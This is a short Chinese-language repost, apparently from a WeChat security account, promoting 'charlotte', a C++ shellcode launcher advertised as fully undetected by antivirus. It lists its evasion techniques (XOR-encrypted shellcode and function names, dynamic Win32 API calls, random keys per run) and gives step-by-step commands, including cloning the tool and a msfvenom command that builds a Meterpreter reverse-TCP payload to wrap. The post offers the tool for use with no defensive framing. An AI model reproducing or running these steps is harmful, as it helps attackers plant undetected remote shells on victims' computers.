c++ shellcode启动器,截至2021年5月13日,0/26完全未被检测到。
win32 api函数的动态调用
shellcode和函数名的异或加密
每次运行随机XOR键和变量
在KaliLinux上,只需'apt-get install mingw-w64*'就可以了!
2021年5月17日:
随机字符串长度和XOR键长度
使用
注:使用msfvenom -p测试以及CobaltStrike原始格式Payload!
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py
下载地址
https://github.com/9emin1/charlotte
如有侵权,请联系删除
原文始发于微信公众号(系统安全运维):完全未被检测到的shellcode启动器
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论